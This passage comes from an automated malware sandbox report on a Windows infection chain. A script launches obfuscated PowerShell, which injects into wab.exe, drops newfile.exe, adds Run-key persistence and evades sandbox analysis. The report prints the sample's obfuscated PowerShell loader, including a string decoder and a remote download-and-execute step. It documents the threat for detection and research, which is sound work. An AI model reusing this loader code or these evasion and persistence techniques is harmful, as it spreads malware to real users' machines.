            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: explorerframe.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: sxs.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | File opened: C:\Windows\SysWOW64\msftedit.dll
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: POWERSHELL "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatini", "0")
            Source: Yara match | File source: 00000005.00000002.2603283847.000000000CA31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3346276290.0000000007441000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Storhertug $buningens $Ideologic), (Hensattes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Paddy = [AppDomain]::CurrentDomain.GetAssemblies()$global:Cla
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Paramastitis)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kidders21, $false).DefineType($Hidfrtes, $Sl
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [very long obfuscated PowerShell command line omitted]
            Source: newfile.exe.10.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
            Source: newfile.exe.10.dr Static PE information: section name: .didat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34897967 push ebx; retf 2_2_00007FFD3489796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348909A2 push E85E535Dh; ret 2_2_00007FFD348909F9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04F645F7 push ss; retn 0007h 5_2_04F64602
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04F64529 push es; retn 0007h 5_2_04F64552
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04F66998 push eax; retn 0007h 5_2_04F669A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07DD0638 push eax; mov dword ptr [esp], ecx 5_2_07DD0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07DD0AB8 push eax; mov dword ptr [esp], ecx 5_2_07DD0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07DDE8C0 pushfd ; ret 5_2_07DDEDA3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_09650D13 push edx; iretd 5_2_09650D14
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_09651CF8 pushfd ; ret 5_2_09651CF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0965134D pushfd ; iretd 5_2_0965135A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_09650E72 pushfd ; retf 5_2_09650E89
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_09654AE0 push ds; retf 5_2_09654B10
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_09650EF9 push cs; retf 5_2_09650F0A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_09650AA1 push ecx; ret 5_2_09650AA3
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04061CF8 pushfd ; ret 10_2_04061CF9
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04060D13 push edx; iretd 10_2_04060D14
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04060E72 pushfd ; retf 10_2_04060E89
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04060AA1 push ecx; ret 10_2_04060AA3
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04064AE0 push ds; retf 10_2_04064B10
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04060EF9 push cs; retf 10_2_04060F0A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0406134D pushfd ; iretd 10_2_0406135A
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 12_2_003813F8 pushfd ; retf 12_2_003813F9
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 12_2_0038376D push ecx; ret 12_2_00383780
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | delete
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 24520000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 243F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4288Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7919Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1865Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5030Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3983Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 5884Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 7919 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4440Thread sleep count: 1865 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4616Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588Thread sleep count: 5030 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588Thread sleep count: 3983 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99653s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99542s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99218s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98999s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98452s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98124s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97864s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97750s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97637s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97526s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97416s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97311s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97202s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97088s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96962s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96842s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96732s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96624s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96512s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96296s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96062s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95834s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95718s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95604s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95489s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95374s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95265s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95142s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -94902s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99653Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99542Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98999Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98452Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98124Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97864Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97750Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97637Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97526Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97416Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97311Jump to behavior
